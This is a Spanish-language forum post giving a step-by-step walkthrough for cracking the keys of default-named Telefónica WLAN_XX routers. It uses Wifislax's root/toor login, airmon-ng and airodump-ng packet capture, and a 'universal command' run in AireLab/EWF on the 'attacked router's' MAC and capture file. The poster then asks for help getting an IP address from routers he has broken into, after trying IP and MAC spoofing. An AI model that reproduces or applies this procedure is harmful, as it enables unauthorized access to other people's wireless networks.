Hola , me llamo Manuel santos y es la primera ves que entro en este foro , es muy interesante todo lo que e podido leer y entender , espero me disculpéis por si me precipito en mis actuaciones , no acostumbro a participar en foros y soy un poco torpon

Conforme al tema en cuestión yo e utilizado el wifisla 3.0 y una antena alfa networ chiset realtek

Luego una vez reinicio habiendo introducido wifisla y se abre

e puesto en loging- root
en passwoor-toor
sale wifisla -xconf
sale wifisla -startx y ya sabemos que esto es para configurar la tarjeta grafica de linux
se abre el entorno de wifisla y su música
wfisla -iwconfig wlan0
wifisla -airmon-ng start wlan0 6
wifisla - iwconfig wlano
wifisla - airodump-ng -w xxxx wlan0 ( esto es para buscar canal)
hay un pequeño toque de dos teclas y seguimos
wifisla- airodump-ng -w xxxx -c11 wlan0
hay un pequeño toque de dos teclas de nuevo
wifisla - ls
cierro la ventana ( se me olvidaba , una ves hubiera captura do un solo paquete
y teniendo guardado en la unidad c del pc airelab y el comando universal

cd..&&cd..&&cd AIRELAB&&EWF 00:00:00:00:00:00 WLAN_00 xxxx-02.cap (clave universal) poniendo la mac del routers atacado y su nombre wlan_00 o xx y el ivs capturado -02.cap o -03.cap etc
Me voy a Home en wifisla y copio clave -02.cap
pincho carpeta mnt luego en sda1 que contiene el airela , vuelvo a pinchar y pego en el centro pantalla con post file , cierro todas las ventanas .
entro en la unidad c copio comando universal con su mac y los punto cap correspondiente y pincho en airela , pincho en acceso directo a consola y pego comando universal y obtengo la clave en tan solo 3, 4 minutos siempre que tenga capturado un mínimo de 1 o mas paquetes aveces ,espero que os sirva de algo .

Mi pregunta es que en alguno routers de telefónica (wlan_7B ) aun teniendo la clave y colocándola y diciendo me el ordenador obteniendo direccion de red y luego me pone conectado , es que al querer entrar en Internet no me deja ( y creo que no me designa ip por alguna configuracion interna del routers , e intentado cambiar mi ip y la mac de la antena y aun asin no me deja después de tener la clave , ¿ podéis ayudarme